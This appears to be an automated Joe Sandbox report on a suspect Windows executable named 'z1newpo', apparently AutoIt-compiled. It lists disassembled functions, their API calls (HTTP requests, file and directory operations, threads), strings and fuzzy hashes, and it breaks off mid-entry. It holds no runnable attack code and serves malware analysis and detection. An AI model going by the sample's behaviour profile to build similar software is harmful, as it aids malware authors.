                                                    • API String ID: 4174999648-3243417748
                                                    • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                    • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                    Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 1291720006-3916222277
                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                    • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                    Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID: 0$2
                                                    • API String ID: 93392585-3793063076
                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                    Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                    • String ID: crts
                                                    • API String ID: 586820018-3724388283
                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                    Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2326526234-1173974218
                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                    Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                    • _wcslen.LIBCMT ref: 004335F2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                    • String ID: \
                                                    • API String ID: 321622961-2967466578
                                                    • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                    • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                    Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                    • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                    Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                    • _wprintf.LIBCMT ref: 004340A1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                    • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                    Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                    • __lock.LIBCMT ref: 00417981
                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                    • __lock.LIBCMT ref: 004179A2
                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                    • String ID: KERNEL32.DLL$pI
                                                    • API String ID: 637971194-197072765
                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                    Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_malloc
                                                    • String ID:
                                                    • API String ID: 1938898002-0
                                                    • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                    • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                    Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                    • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                    • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                      • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                    • String ID:
                                                    • API String ID: 3771399671-0
                                                    • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                    • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                    • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                    • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                    Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                    • _memmove.LIBCMT ref: 0044B555
                                                    • _memmove.LIBCMT ref: 0044B578
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                    • String ID:
                                                    • API String ID: 2737351978-0
                                                    • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                    • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                    Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                    • __getptd.LIBCMT ref: 00415253
                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                    • _free.LIBCMT ref: 0041529E
                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 3638380555-0
                                                    • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                    • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                    Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 3207048006-625585964
                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
